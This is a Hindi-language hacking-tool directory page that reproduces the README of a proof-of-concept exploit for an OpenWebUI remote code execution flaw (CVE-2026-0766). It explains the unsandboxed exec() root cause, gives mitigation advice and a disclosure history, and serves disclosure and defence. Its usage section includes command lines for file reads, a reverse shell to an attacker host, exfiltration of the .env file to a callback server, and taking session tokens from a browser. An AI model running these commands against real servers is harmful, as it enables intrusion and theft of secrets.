Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-0766 — CVE-2026-0766 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो OpenWebUI में टूल कोड इंजेक्शन के माध्यम से रिमोट कोड एक्ज़ीक्यूशन भेद्यता है। इसमें कमांड एक्ज़ीक्यूशन, फ़ाइल रीड, रिवर्स शेल, और ब्लाइंड एक्सफ़िल्ट्रेशन मोड शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/bitt0n/cve-2026-0766
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubbitt0n/cve-2026-0766

CVE-2026-0766

CVE-2026-0766 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो OpenWebUI में टूल कोड इंजेक्शन के माध्यम से रिमोट कोड एक्ज़ीक्यूशन भेद्यता है। इसमें कमांड एक्ज़ीक्यूशन, फ़ाइल रीड, रिवर्स शेल, और ब्लाइंड एक्सफ़िल्ट्रेशन मोड शामिल हैं।

रिपॉजिटरी देखें
45 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-0766: OpenWebUI रिमोट कोड निष्पादन

शैक्षिक सुरक्षा अनुसंधान रिपॉजिटरी

इस रिपॉजिटरी में CVE-2026-0766 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण कोड शामिल है, जो OpenWebUI में एक रिमोट कोड निष्पादन भेद्यता है, जिसे Zero Day Initiative (ZDI) द्वारा खोजा और प्रकाशित किया गया है।


⚠️ अस्वीकरण

यह रिपॉजिटरी केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है।

  • इस कोड का उपयोग अपने स्वयं के सिस्टम या उन सिस्टमों का परीक्षण करने के लिए करें जिनका परीक्षण करने के लिए आपके पास स्पष्ट प्राधिकरण है
  • इसका उपयोग LLM प्लेटफ़ॉर्म सुरक्षा भेद्यताओं के बारे में सीखने के लिए करें
  • ❌ कभी भी स्पष्ट अनुमति के बिना सिस्टम के विरुद्ध इसका उपयोग न करें
  • ❌ कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है

लेखक इस कोड के दुरुपयोग के लिए कोई दायित्व नहीं मानता है। उपयोगकर्ता यह सुनिश्चित करने के लिए पूरी तरह जिम्मेदार हैं कि उनकी गतिविधियाँ सभी लागू कानूनों और विनियमों का अनुपालन करती हैं।


📋 भेद्यता अवलोकन

गुणमान
CVE IDCVE-2026-0766
द्वारा खोजा गयाZero Day Initiative (ZDI)
प्रभावित सॉफ़्टवेयरOpenWebUI
भेद्यता प्रकारकोड इंजेक्शन (CWE-94)
CVSS स्कोर8.8 उच्च
CVSS वेक्टरAV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
हमले की जटिलताकम (प्रमाणित व्यवस्थापक या टूल निर्माण/अद्यतन करने वाला उपयोगकर्ता शोषण कर सकता है)

OpenWebUI क्या है?

OpenWebUI बड़े भाषा मॉडलों के लिए एक स्व-होस्टेड वेब इंटरफ़ेस है। यह ChatGPT जैसा अनुभव प्रदान करता है जिसे संगठन अपने स्वयं के बुनियादी ढांचे पर चला सकते हैं, LLM वार्तालापों और डेटा को ऑन-प्रिमाइसेस रखते हुए।

भेद्यता

OpenWebUI में एक "टूल्स" सुविधा शामिल है जो उपयोगकर्ताओं को Python कोड सबमिट करके LLM क्षमताओं का विस्तार करने की अनुमति देती है। यह कोड Python के exec() फ़ंक्शन के माध्यम से सर्वर-साइड पर बिना किसी सैंडबॉक्सिंग, सत्यापन या सुरक्षा नियंत्रण के निष्पादित किया जाता है।

शोषण प्रवाह:

  1. प्रमाणित उपयोगकर्ता POST /api/v1/tools/create के माध्यम से एक "टूल" बनाता है
  2. उपयोगकर्ता द्वारा प्रदान किया गया Python कोड content फ़ील्ड में संग्रहीत किया जाता है
  3. सर्वर utils/plugin.py में exec(content, module.__dict__) को कॉल करता है
  4. मनमाना Python कोड पूर्ण सर्वर विशेषाधिकारों के साथ निष्पादित होता है
  5. हमलावर रिमोट कोड निष्पादन (RCE) प्राप्त करता है

मुख्य अंतर्दृष्टि: कोड टूल निर्माण के समय निष्पादित होता है, न कि जब LLM टूल को आमंत्रित करता है। इसका मतलब है कि केवल एक दुर्भावनापूर्ण टूल बनाना RCE को ट्रिगर करता है - आगे किसी इंटरैक्शन की आवश्यकता नहीं है।

परीक्षण किए गए संस्करण

यह शोषण निम्न पर सत्यापित किया गया है:

  • OpenWebUI v0.8.10 - भेद्य ✅ (परीक्षण 2026-03-28)

भेद्यता स्थापत्य है (उपयोगकर्ता इनपुट पर exec() का असुरक्षित उपयोग) और OpenWebUI टीम द्वारा सुरक्षा पैच जारी होने तक सभी संस्करणों में मौजूद है।


🔍 तकनीकी विवरण

मूल कारण

भेद्यता backend/open_webui/utils/plugin.py में मौजूद है:

root@kitploit:~
def load_tool_module_by_id(tool_id: str, content: str):
    # न्यूनतम प्रीप्रोसेसिंग (सुरक्षा नियंत्रण नहीं)
    content = replace_imports(content)

    # मॉड्यूल बनाएं और उपयोगकर्ता कोड निष्पादित करें
    module = types.ModuleType(f"tool_{tool_id}")
    exec(content, module.__dict__)  # ← भेद्यता

    return module

replace_imports() फ़ंक्शन केवल आयात पथों को फिर से लिखता है (कॉस्मेटिक) - यह प्रतिबंधित नहीं करता कि कौन सा कोड निष्पादित हो सकता है। यहाँ है:

  • ❌ कोई सैंडबॉक्सिंग नहीं (कोई प्रतिबंधित निष्पादन वातावरण नहीं)
  • ❌ कोई कोड सत्यापन नहीं (कोई AST निरीक्षण या अनुमतिसूची नहीं)
  • ❌ कोई अनुमति जाँच नहीं (सभी प्रमाणित उपयोगकर्ता डिफ़ॉल्ट रूप से टूल बना सकते हैं)
  • ❌ कोई विशेषाधिकार पृथक्करण नहीं (कोड OpenWebUI सेवा खाते के रूप में चलता है)

विक्रेता प्रतिक्रिया

OpenWebUI टीम ने शुरू में इसे कम-प्राथमिकता के रूप में मूल्यांकन किया, यह देखते हुए कि टूल निर्माण के लिए व्यवस्थापक अनुमतियों की आवश्यकता होती है। हालाँकि:

  1. अनुमति प्रत्यायोजन सामान्य है - कई परिनियोजन पावर उपयोगकर्ताओं, कार्यक्षेत्र व्यवस्थापकों और डेवलपर्स को टूल निर्माण प्रदान करते हैं
  2. समझौता किए गए व्यवस्थापक खाते - फ़िशिंग, क्रेडेंशियल स्टफिंग और SSO समझौता हमलावरों को व्यवस्थापक पहुंच दे सकते हैं
  3. गहराई में रक्षा का उल्लंघन - व्यवस्थापक क्रियाएँ भी प्रतिबंधित होनी चाहिए; अप्रतिबंधित कोड निष्पादन न्यूनतम विशेषाधिकार के सिद्धांत को तोड़ता है
  4. समझौते के बाद उपयोगिता - यह भेद्यता प्रारंभिक पहुंच के बाद हमले की श्रृंखलाओं में मूल्यवान है

विक्रेता द्वारा व्यवस्थापक को प्रतिबंधित पहुंच के साथ इसे प्रबंधित करने का प्रस्ताव देने के बाद, ZDI ने इसे 0-दिन भेद्यता के रूप में प्रकाशित किया है (ZDI-26-032) रक्षकों को सूचित करने के लिए।

लेखक ओपन-सोर्स परियोजनाओं को बनाए रखने की चुनौतियों का सम्मान करता है। सुरक्षा पैचिंग के लिए उपयोगकर्ता आवश्यकताओं, स्थापत्य बाधाओं और सीमित संसाधनों को संतुलित करने की आवश्यकता होती है। यह प्रकाशन सुरक्षा टीमों को जोखिम का आकलन करने और शमन लागू करने में मदद करने के उद्देश्य से है।


🛠️ प्रूफ ऑफ कॉन्सेप्ट

स्थापना

root@kitploit:~
git clone https://github.com/bitt0n/CVE-2026-0766.git
cd CVE-2026-0766
pip install requests urllib3

उपयोग

शोषण स्क्रिप्ट (exploit.py) कई हमले मोड का समर्थन करती है:

1. कमांड निष्पादन

OS कमांड निष्पादित करें और आउटपुट प्राप्त करें:

root@kitploit:~
python3 exploit.py --url http://target:3000 --token YOUR_TOKEN --cmd "id"

2. फ़ाइल पढ़ना

सर्वर फ़ाइल सिस्टम से फ़ाइलें पढ़ें:

root@kitploit:~
python3 exploit.py --url http://target:3000 --token YOUR_TOKEN --read /etc/passwd

3. रिवर्स शेल

रिवर्स शेल स्पॉन करें (netcat लिसनर की आवश्यकता है):

root@kitploit:~
# हमलावर मशीन पर:
nc -lvnp 4444

# शोषण चलाएँ:
python3 exploit.py --url http://target:3000 --token YOUR_TOKEN --revshell ATTACKER_IP:4444

4. ब्लाइंड एक्सफ़िल्ट्रेशन

कमांड आउटपुट को HTTP कॉलबैक सर्वर पर भेजें:

root@kitploit:~
python3 exploit.py --url http://target:3000 --token YOUR_TOKEN --callback http://your-server:8080 --cmd "cat /app/.env"

प्रमाणीकरण

स्क्रिप्ट JWT टोकन (SSO लॉगिन से) और API कुंजी दोनों स्वीकार करती है:

JWT टोकन प्राप्त करना:

  1. OpenWebUI में सामान्य रूप से लॉग इन करें (SSO या स्थानीय प्रमाणीकरण)
  2. ब्राउज़र DevTools खोलें (F12)
  3. अपना टोकन खोजें:
    • कुकीज़ टैब: token कुकी मान देखें
    • नेटवर्क टैब: किसी भी API अनुरोध से Authorization: Bearer ... हेडर कॉपी करें
    • कंसोल: localStorage.getItem("token") चलाएँ
  4. टोकन को स्क्रिप्ट में पास करें: --token eyJhbGci...

🔐 शमन

रक्षकों के लिए

यदि आप OpenWebUI चलाते हैं और तुरंत पैच नहीं कर सकते:

  1. टूल निर्माण अनुमतियों को प्रतिबंधित करें केवल अत्यधिक विश्वसनीय व्यवस्थापकों तक
  2. मौजूदा टूल्स का ऑडिट करें दुर्भावनापूर्ण कोड के लिए (डेटाबेस में टूल सामग्री जाँचें)
  3. OpenWebUI को न्यूनतम विशेषाधिकारों के साथ चलाएँ (समर्पित सेवा खाता, जहाँ संभव हो केवल-पठनीय फ़ाइल सिस्टम)
  4. नेटवर्क एग्रेस फ़िल्टरिंग लागू करें (कंटेनर के पास मनमाना आउटबाउंड पहुंच नहीं होनी चाहिए)
  5. संदिग्ध टूल निर्माण की निगरानी करें (सामान्य कार्यप्रवाह के बाहर बनाए गए टूल्स पर नज़र रखें)

अनुशंसित सुधार (रखरखावकर्ताओं के लिए)

  1. exec() को सुरक्षित विकल्प से बदलें:

    • सैंडबॉक्स निष्पादन के लिए RestrictedPython का उपयोग करें
    • Python AST पार्स करें और सुरक्षित संचालन की अनुमतिसूची के विरुद्ध सत्यापित करें
    • टूल कोड को पृथक कंटेनरों में निष्पादित करें (gVisor, Firecracker)
  2. अनुमति जाँच जोड़ें:

    • नए टूल्स के लिए व्यवस्थापक अनुमोदन की आवश्यकता हो
    • टूल निर्माण के लिए भूमिका-आधारित पहुंच नियंत्रण लागू करें
    • टूल्स सक्रिय होने से पहले कोड समीक्षा कार्यप्रवाह जोड़ें
  3. गहराई में रक्षा:

    • टूल्स को syscall फ़िल्टरिंग (seccomp) के साथ अलग प्रक्रियाओं में चलाएँ
    • फ़ाइल सिस्टम पहुंच को केवल-पठनीय तक सीमित करें
    • टूल निष्पादन वातावरण से नेटवर्क पहुंच हटाएँ

📚 संदर्भ

  • NVD प्रविष्टि: https://nvd.nist.gov/vuln/detail/CVE-2026-0766
  • ZDI सलाह: https://www.zerodayinitiative.com/advisories/ZDI-26-032/
  • GitHub सुरक्षा सलाह: https://github.com/advisories/GHSA-cggw-334c-f4mj
  • CWE-94 (कोड इंजेक्शन): https://cwe.mitre.org/data/definitions/94.html
  • OWASP कोड इंजेक्शन: https://owasp.org/www-community/attacks/Code_Injection

🙏 श्रेय

  • भेद्यता खोज: Zero Day Initiative (ZDI) - ZDI-26-032 / ZDI-CAN-28257
  • शोषण अनुसंधान और PoC विकास: प्रदीप पिल्लई (@bitt0n)

📜 लाइसेंस

MIT लाइसेंस - विवरण के लिए LICENSE फ़ाइल देखें।

यह कोड शैक्षिक और रक्षात्मक सुरक्षा उद्देश्यों के लिए प्रदान किया गया है। लेखक दुरुपयोग के लिए जिम्मेदार नहीं है।


🤝 जिम्मेदार प्रकटीकरण

यह भेद्यता जिम्मेदारी से प्रकट की गई थी:

  1. ZDI ने भेद्यता की खोज की और OpenWebUI को रिपोर्ट की
  2. समन्वित प्रकटीकरण अवधि पैचिंग के लिए विक्रेता को प्रदान की गई
  3. विक्रेता ने पैच करने से इनकार कर दिया (स्वीकार्य जोखिम के रूप में मूल्यांकन किया गया)
  4. ZDI ने सुरक्षा समुदाय को सूचित करने के लिए 0-दिन के रूप में प्रकाशित किया
  5. यह PoC प्रकटीकरण के बाद प्रकाशित किया गया रक्षकों को जोखिम का आकलन करने में मदद करने के लिए

यदि आप ओपन-सोर्स परियोजनाओं में सुरक्षा भेद्यताएँ खोजते हैं, तो कृपया जिम्मेदार प्रकटीकरण प्रथाओं का पालन करें और सार्वजनिक प्रकटीकरण से पहले रखरखावकर्ताओं को पैच करने का समय दें।


प्रश्नों या प्रतिक्रिया के लिए: इस रिपॉजिटरी में एक मुद्दा खोलें।

टूल डाउनलोड करें